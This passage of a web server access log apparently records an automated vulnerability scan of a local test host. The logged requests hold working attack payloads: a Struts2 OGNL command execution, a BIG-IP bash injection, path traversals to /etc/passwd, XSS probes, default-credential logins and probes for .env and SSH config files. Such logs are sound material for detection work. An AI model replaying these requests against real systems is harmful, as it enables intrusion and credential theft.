Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gotoURL.asp?url=example.com&id=43569 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.165","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.166","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.167","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"csrf_token={{csrf_token}}&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.169","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"1.175","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/ssh-config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/dbstat/gettablessize HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(297MTszV7IIRdTsw97tlanLAfDW)%3c%2fscript%3e&win=2707 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/settings/values HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 